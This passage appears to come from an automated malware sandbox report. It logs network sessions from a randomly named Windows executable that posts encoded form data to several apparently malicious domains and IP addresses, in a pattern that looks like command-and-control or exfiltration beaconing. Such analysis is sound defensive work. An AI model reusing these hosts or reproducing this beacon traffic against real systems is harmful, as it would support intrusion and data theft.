                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.booosted.xyz
                                                                                                                          Referer: http://www.booosted.xyz/12c7/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 62 56 36 4d 38 56 61 6a 64 57 44 73 6f 39 4f 57 41 4c 5a 33 76 77 4a 49 44 35 76 4d 39 76 67 70 52 72 6d 37 49 56 62 79 6a 56 61 55 44 49 72 77 36 70 38 45 45 6f 74 6a 61 77 6b 63 6b 61 4d 43 73 37 33 59 72 77 6d 4c 44 31 39 36 65 55 41 30 78 31 66 41 74 41 58 71 4e 76 2b 35 42 7a 70 4f 63 50 32 49 6c 72 31 73 6f 77 4a 36 4a 64 78 50 6c 64 79 74 68 54 33 77 47 58 62 4b 77 36 39 31 33 30 61 63 71 65 6f 52 4e 5a 74 34 62 34 6b 78 74 70 75 47 51 39 2f 68 77 35 7a 59 65 38 4b 66 30 49 30 36 64 6e 37 68 38 4b 6a 61 7a 50 67 36 48 7a 43 61 73 6e 33 74 41 52 48 76 53 33 32 4a 48 58 52 4d 53 5a 4d 4b 33 41 30 54 77 4c 39 70 52 53 58 45 6a 67 3d 3d
                                                                                                                          Data Ascii: qFHlI=mmiLmwXyfZXgbV6M8VajdWDso9OWALZ3vwJID5vM9vgpRrm7IVbyjVaUDIrw6p8EEotjawkckaMCs73YrwmLD196eUA0x1fAtAXqNv+5BzpOcP2Ilr1sowJ6JdxPldythT3wGXbKw69130acqeoRNZt4b4kxtpuGQ9/hw5zYe8Kf0I06dn7h8KjazPg6HzCasn3tARHvS32JHXRMSZMK3A0TwL9pRSXEjg==


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          43192.168.2.6573573.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:36.771065950 CEST1785OUTPOST /12c7/ HTTP/1.1
                                                                                                                          Host: www.booosted.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.booosted.xyz
                                                                                                                          Referer: http://www.booosted.xyz/12c7/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 62 56 36 4d 38 56 61 6a 64 57 44 73 6f 39 4f 57 41 4c 5a 33 76 77 4a 49 44 35 76 4d 39 76 34 70 57 59 2b 37 4b 32 7a 79 69 56 61 55 41 49 71 33 36 70 38 38 45 6f 31 76 61 77 6f 69 6b 66 51 43 74 5a 76 59 69 6b 4b 4c 4a 31 39 36 53 30 41 31 79 46 66 56 74 41 6e 55 4e 76 4f 35 42 7a 70 4f 63 4f 47 49 6d 36 31 73 75 77 4a 35 4f 64 78 35 68 64 79 57 68 54 76 67 47 58 57 2f 7a 4c 64 31 79 6b 4b 63 6f 73 41 52 45 5a 74 36 61 34 6c 75 74 70 79 5a 51 35 65 59 77 35 32 31 65 2f 57 66 32 50 78 65 59 7a 6a 6d 6f 4b 37 68 6e 34 59 66 4c 44 32 32 32 45 48 30 45 48 57 65 59 6d 47 4b 4c 44 4a 48 53 62 56 74 77 79 41 34 37 39 49 43 62 41 43 66 32 35 47 6d 30 2f 48 63 58 2f 48 67 4e 63 59 72 6b 7a 58 31 58 32 71 74 48 6d 47 52 57 47 6a 57 44 48 69 47 6c 68 42 79 64 53 44 46 45 6f 77 71 76 33 4a 71 4b 6a 61 44 57 6b 30 7a 58 45 6d 70 36 53 6d 42 41 7a 4a 30 55 43 61 48 30 4a 4e 6f 2b 2b 6e 55 4d 42 4a 64 6e 74 39 35 70 4f 68 66 44 32 78 61 37 37 55 71 69 55 49 4f [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=mmiLmwXyfZXgbV6M8VajdWDso9OWALZ3vwJID5vM9v4pWY+7K2zyiVaUAIq36p88Eo1vawoikfQCtZvYikKLJ196S0A1yFfVtAnUNvO5BzpOcOGIm61suwJ5Odx5hdyWhTvgGXW/zLd1ykKcosAREZt6a4lutpyZQ5eYw521e/Wf2PxeYzjmoK7hn4YfLD222EH0EHWeYmGKLDJHSbVtwyA479ICbACf25Gm0/HcX/HgNcYrkzX1X2qtHmGRWGjWDHiGlhBydSDFEowqv3JqKjaDWk0zXEmp6SmBAzJ0UCaH0JNo++nUMBJdnt95pOhfD2xa77UqiUIOAz7nFVb+v+8U5uGP2B0Elmcain3/RDCIlX59MGB2sm5lSeUMUF5NcMUqs2Du2/Z5JqkdGpeWfhrwa05+EMLtyMblJuudXqQnWZoD9j7XwuhFuwFjzJ5MeXQDZpRloRoGkX0+wu8/EmEj1PaozhqBvm2fr8LyoHQ2Pnr0aTeKF5RgISxwwWfKkUWz9XDkmnhh4JMh7TMsHD/oY7dL/o43OYjjsalIVKcmJfPp//y7pd5NnifabJdXK2J/vzG+07RdVANSWwsrnBl32/KgRMGETyy7j8IILXOny0JP0znYTkxWv+F5q7KZja0aIh7Pj/emmrXch/KbV6iSC5yfKGODG3+dVMOBBtdcm3SHXd93prn4zSbFxZwpJuMW7exGQ+6AV8HWnOv0vxFsl/YBuneFyzRLJewKdfkihqCJB8y3tKrzzIBmDluTI6o1uufz00KJcJfvXqB/UUzX3Yid57iETplWV60W/1aECjN6riHQX1WgbSlNyzmpQYAX3MLc7NL5iWXgrp0mG340cHWFxjzkaVZ/GTV0RwKVCFKbGIVpYIPTQJ0ezqQNyWzBTzuBJ3ppR7UxEfqhy3cUqVv3Z1Bp+xrH79QGpfQKGabYmu/bk0RDyy7qemNpeuaFzSuWo6hUjq9gp6Nb7SHgFvxA1u6vwbflKHetJye2Iu [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          44192.168.2.6573583.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:39.314145088 CEST495OUTGET /12c7/?qFHlI=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqLWVeQHwe4Xrlx3fbLdvyLDYZde2riYRc/AFjVf5IhMWO0SHTC3s=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.booosted.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:27:39.729233980 CEST417INHTTP/1.1 200 OK
                                                                                                                          Server: openresty
                                                                                                                          Date: Mon, 21 Oct 2024 15:27:39 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 277
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 71 46 48 6c 49 3d 72 6b 4b 72 6c 41 65 38 50 4d 33 32 52 6c 79 72 34 79 69 62 41 78 44 77 37 4b 47 4b 4b 4d 49 39 6c 6a 52 33 45 71 72 6a 35 63 59 48 59 62 4f 34 49 67 4c 2f 76 43 61 66 56 71 37 36 78 73 49 57 4f 4d 31 52 59 52 34 68 31 75 73 4e 36 74 36 72 68 67 4c 71 4c 57 56 65 51 48 77 65 34 58 72 6c 78 33 66 62 4c 64 76 79 4c 44 59 5a 64 65 32 72 69 59 52 63 2f 41 46 6a 56 66 35 49 68 4d 57 4f 30 53 48 54 43 33 73 3d 26 44 4a 3d 75 4e 78 34 38 6a 64 50 79 76 6d 68 71 74 4d 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?qFHlI=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqLWVeQHwe4Xrlx3fbLdvyLDYZde2riYRc/AFjVf5IhMWO0SHTC3s=&DJ=uNx48jdPyvmhqtM0"}</script></head></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          45192.168.2.6573598.210.49.139802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:45.694704056 CEST751OUTPOST /0628/ HTTP/1.1
                                                                                                                          Host: www.djazdgc.tokyo
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.djazdgc.tokyo
                                                                                                                          Referer: http://www.djazdgc.tokyo/0628/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6a 66 39 76 76 70 6b 70 59 58 42 6d 79 74 6d 32 4a 5a 35 4a 51 41 7a 61 7a 50 43 42 74 59 2f 74 50 51 4a 75 45 55 67 75 66 56 65 45 39 5a 35 76 54 65 37 7a 2b 6f 72 4f 49 5a 61 43 57 33 47 2b 57 44 38 70 69 4f 68 69 59 61 41 42 78 39 44 2b 76 4d 62 50 46 7a 4d 51 5a 62 73 62 4a 74 6b 62 42 67 73 51 42 6b 6c 47 39 4c 6b 30 4f 6a 4e 42 59 68 32 35 61 55 67 6e 6f 48 78 62 7a 78 62 72 6b 47 67 54 79 48 4c 50 6f 64 73 5a 48 4c 4c 31 58 6c 78 4a 77 72 38 54 75 74 6a 35 4b 41 6f 32 49 59 51 6a 73 34 6a 50 39 4a 4d 43 41 41 39 7a 36 46 2b 46 34 79 56 59 61 70 79 53 41 34 52 78 6f 59 2f 46 34 30 57 77 31 4d 32 47
                                                                                                                          Data Ascii: qFHlI=jf9vvpkpYXBmytm2JZ5JQAzazPCBtY/tPQJuEUgufVeE9Z5vTe7z+orOIZaCW3G+WD8piOhiYaABx9D+vMbPFzMQZbsbJtkbBgsQBklG9Lk0OjNBYh25aUgnoHxbzxbrkGgTyHLPodsZHLL1XlxJwr8Tutj5KAo2IYQjs4jP9JMCAA9z6F+F4yVYapySA4RxoY/F40Ww1M2G
                                                                                                                          Oct 21, 2024 17:27:46.458865881 CEST507INHTTP/1.1 200
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:27:46 GMT
                                                                                                                          Content-Type: application/json;charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Origin
                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                          Access-Control-Allow-Origin: http://www.djazdgc.tokyo
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 54{"msg":"/0628/","code":401}0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          46192.168.2.6573608.210.49.139802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:48.243247986 CEST775OUTPOST /0628/ HTTP/1.1
                                                                                                                          Host: www.djazdgc.tokyo
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.djazdgc.tokyo
                                                                                                                          Referer: http://www.djazdgc.tokyo/0628/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6a 66 39 76 76 70 6b 70 59 58 42 6d 30 35 69 32 4d 36 52 4a 53 67 7a 62 71 50 43 42 69 34 2f 70 50 51 56 75 45 56 6b 2b 59 6e 4b 45 39 35 4a 76 53 62 48 7a 2f 6f 72 4f 63 4a 61 48 5a 58 47 50 57 43 41 50 69 4d 6c 69 59 61 55 42 78 35 50 2b 73 39 62 4d 4b 44 4d 53 57 37 73 64 47 4e 6b 62 42 67 73 51 42 6b 78 2f 39 4c 4d 30 4f 77 56 42 5a 46 71 36 58 30 67 67 38 58 78 62 35 52 62 76 6b 47 68 30 79 47 6e 6c 6f 66 45 5a 48 4f 33 31 55 33 5a 4f 70 62 39 57 6a 4e 69 46 62 78 31 38 4f 65 46 79 79 36 50 4f 72 70 41 33 46 32 38 70 6d 32 2b 6d 71 69 31 61 61 72 71 67 41 59 52 62 71 59 48 46 71 6a 61 58 36 34 54 6c 62 51 62 58 49 66 4c 4d 67 39 32 6f 61 4e 6c 4e 42 72 6b 5a 48 77 3d 3d
                                                                                                                          Data Ascii: qFHlI=jf9vvpkpYXBm05i2M6RJSgzbqPCBi4/pPQVuEVk+YnKE95JvSbHz/orOcJaHZXGPWCAPiMliYaUBx5P+s9bMKDMSW7sdGNkbBgsQBkx/9LM0OwVBZFq6X0gg8Xxb5RbvkGh0yGnlofEZHO31U3ZOpb9WjNiFbx18OeFyy6POrpA3F28pm2+mqi1aarqgAYRbqYHFqjaX64TlbQbXIfLMg92oaNlNBrkZHw==
                                                                                                                          Oct 21, 2024 17:27:49.030792952 CEST502INHTTP/1.1 200
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:27:48 GMT
                                                                                                                          Content-Type: application/json;charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Origin
                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                          Access-Control-Allow-Origin: http://www.djazdgc.tokyo
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                                                          Data Ascii: 54{"msg":"/0628/","code":401}
                                                                                                                          Oct 21, 2024 17:27:49.030817032 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          47192.168.2.6573618.210.49.139802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:50.787072897 CEST1788OUTPOST /0628/ HTTP/1.1
                                                                                                                          Host: www.djazdgc.tokyo
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.djazdgc.tokyo
                                                                                                                          Referer: http://www.djazdgc.tokyo/0628/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6a 66 39 76 76 70 6b 70 59 58 42 6d 30 35 69 32 4d 36 52 4a 53 67 7a 62 71 50 43 42 69 34 2f 70 50 51 56 75 45 56 6b 2b 59 6e 79 45 39 4b 42 76 51 34 76 7a 6c 6f 72 4f 66 4a 61 47 5a 58 47 53 57 44 6f 54 69 4d 70 79 59 59 73 42 77 63 54 2b 6e 70 48 4d 52 7a 4d 53 55 37 73 59 4a 74 6b 4f 42 67 38 55 42 6b 68 2f 39 4c 4d 30 4f 78 6c 42 4e 68 32 36 45 6b 67 6e 6f 48 78 58 7a 78 62 58 6b 48 46 4f 79 47 54 66 6f 50 6b 5a 45 75 48 31 48 7a 35 4f 32 72 39 59 67 4e 69 64 62 78 35 2f 4f 61 6c 2b 79 36 58 67 72 75 49 33 45 53 74 6d 78 56 79 2f 78 52 46 65 48 4c 75 63 59 2f 4d 6c 71 4b 58 6c 6a 53 53 36 36 37 58 54 57 55 54 52 64 49 69 44 6e 64 2b 6d 56 71 67 4f 45 49 31 39 57 44 4f 73 6a 31 4d 63 38 6f 35 52 41 63 49 39 65 65 64 32 6b 35 6f 59 7a 44 4b 78 31 7a 34 6b 38 46 7a 7a 7a 32 6e 38 73 30 6d 35 6c 79 44 50 35 43 64 38 39 33 38 6d 6d 31 39 75 54 72 61 5a 4c 51 35 64 71 64 49 4d 4e 53 72 77 71 51 54 75 73 68 61 5a 35 78 6d 62 4b 35 36 61 33 4f 6d 5a 6f 69 41 47 54 76 35 36 4a 30 44 64 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=jf9vvpkpYXBm05i2M6RJSgzbqPCBi4/pPQVuEVk+YnyE9KBvQ4vzlorOfJaGZXGSWDoTiMpyYYsBwcT+npHMRzMSU7sYJtkOBg8UBkh/9LM0OxlBNh26EkgnoHxXzxbXkHFOyGTfoPkZEuH1Hz5O2r9YgNidbx5/Oal+y6XgruI3EStmxVy/xRFeHLucY/MlqKXljSS667XTWUTRdIiDnd+mVqgOEI19WDOsj1Mc8o5RAcI9eed2k5oYzDKx1z4k8Fzzz2n8s0m5lyDP5Cd8938mm19uTraZLQ5dqdIMNSrwqQTushaZ5xmbK56a3OmZoiAGTv56J0DdtYz7Y4pvuJppYpLaLHVnJ7RHx5nCDWbro+OI5W1J1qtYtl13+LyNnsGn2H9J0yTggT+5p1ENVwgUZDE+iJUrW0ayE+bWHGhzrO+lZk6PRKyhnjPkuVCYB1BFfl/0i+OOJ7CpBxdE3WTNN7Bc8fPe6plDha71pYb/JWhxO7GcLIVusXKkJlvl2Ewug1C/OSmoWLEbMtgff5nKz2C2s2JhHoEBgaDT558QwG1jh7qk8sJeWDJp0XN+xPQSD53nIB56pjmwl7zJTjLCLmyRVbzynjAqDm/63ZbLzhIztcUl2f7iAJUramlWZ6Fu5Sdsz8x82RaSZ5gRyRIrX+AMwZcVgzCsD76exbuByzCNvu8SfjRwLMkwvfK3taFe8ZHbGtbzqd3fH8KJLNrCH7r9ecLg6hpHPz6c1sVife5MdWXcQAil+5jDpNc+pbEtR69P/rkMkecsvP2bbm1lIYdKP5i1Q59KCIXH27L3VTqNhEyNY7valkySoNFPK+oPHBmuMQphv7PUFGCKgQ9KYW2NbDRnNYD7T5aKxCuXFm7RoexveoFhq6HQ2ufdp4ANhHSLPNPYxag4ktywnszuHap7xxKipE7bdcQ1hs5v0b9jUjC/saNLa6vIZiLl9juROB6pq/KA3S3XqjpO1cLHIQzbaNv/65FdhUbmEwM8VX [TRUNCATED]
                                                                                                                          Oct 21, 2024 17:27:51.575293064 CEST502INHTTP/1.1 200
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:27:51 GMT
                                                                                                                          Content-Type: application/json;charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Origin
                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                          Access-Control-Allow-Origin: http://www.djazdgc.tokyo
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                                                          Data Ascii: 54{"msg":"/0628/","code":401}
                                                                                                                          Oct 21, 2024 17:27:51.575453043 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          48192.168.2.6573628.210.49.139802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:53.328782082 CEST496OUTGET /0628/?qFHlI=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+FigCVrQtCrgnSlgUA2JT078+MxZtZD+kFHsD8UJb6CndygVk2Aw=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.djazdgc.tokyo
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:27:54.129630089 CEST427INHTTP/1.1 200
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:27:53 GMT
                                                                                                                          Content-Type: application/json;charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Origin
                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Cache: MISS
                                                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 54{"msg":"/0628/","code":401}0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          49192.168.2.65736394.23.162.163802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:59.420944929 CEST772OUTPOST /9vwi/ HTTP/1.1
                                                                                                                          Host: www.productanalytics.pro
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.productanalytics.pro
                                                                                                                          Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 53 4c 58 52 73 6f 46 34 6a 65 35 4a 45 67 36 34 73 68 38 56 39 49 6d 64 6d 35 45 79 33 2f 32 42 50 36 59 78 56 5a 4f 65 34 36 38 76 5a 47 46 47 34 56 63 48 61 71 53 45 63 75 58 42 61 30 33 33 59 32 77 46 57 41 66 43 4a 44 5a 37 48 6d 36 35 78 51 2f 71 58 39 49 70 68 6a 4f 50 65 74 58 77 76 2b 61 5a 68 48 34 78 59 6c 68 55 70 34 4a 32 44 65 33 36 68 31 79 51 67 68 6b 4f 54 32 44 35 44 49 44 49 6d 43 79 75 54 54 64 68 44 4e 30 65 64 45 78 38 6d 67 36 79 4f 65 47 56 2b 7a 68 7a 4d 65 5a 4c 58 44 4c 63 39 51 73 6d 56 58 5a 63 41 57 6b 69 5a 36 63 78 6d 79 4b 5a 76 4b 43 59
                                                                                                                          Data Ascii: qFHlI=qxonD4gQFvLySLXRsoF4je5JEg64sh8V9Imdm5Ey3/2BP6YxVZOe468vZGFG4VcHaqSEcuXBa033Y2wFWAfCJDZ7Hm65xQ/qX9IphjOPetXwv+aZhH4xYlhUp4J2De36h1yQghkOT2D5DIDImCyuTTdhDN0edEx8mg6yOeGV+zhzMeZLXDLc9QsmVXZcAWkiZ6cxmyKZvKCY


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          50192.168.2.65736694.23.162.163802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:28:01.963342905 CEST796OUTPOST /9vwi/ HTTP/1.1
                                                                                                                          Host: www.productanalytics.pro
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.productanalytics.pro
                                                                                                                          Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                          Content-Length: 234
